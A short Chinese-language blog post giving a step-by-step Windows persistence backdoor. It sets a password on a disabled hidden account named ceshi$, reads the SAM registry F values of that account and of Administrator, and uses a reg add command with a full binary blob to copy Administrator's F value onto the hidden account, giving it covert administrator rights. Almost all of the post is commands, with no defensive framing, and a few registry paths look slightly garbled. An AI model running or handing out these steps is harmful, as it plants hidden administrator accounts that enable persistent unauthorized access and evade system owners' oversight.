总体思路
1.给禁用账户设置密码
2.查看注册表USER下的隐藏用户所对应的键值关系
3.用administrator的F值信息覆盖我们想要利用的禁用账号的F值
本案例使用系统账户-ceshi$ (该用户已禁用)
设置已禁用的账户密码
net user ceshi$ 123456
net user ceshi$ /active:no
找到注册表各用户及用户F值
查看用户ceshi$的类型为0X3ec,并以此找到对应存放权限的子项[000003EC]
reg query HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00001F4 /v F
reg query HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00003EC /v F
用administrator的F值替换ceshi$的F值
reg add "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00003EC" /v F /t REG_BINARY /d 0200010000000000CF2DFBAA4961D9010000000000000000B6483B489F0ED90100000000000000006EF0CCE05E53D901F401000001020000100000000000000000004100010000000000000000000000 /f
说明
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.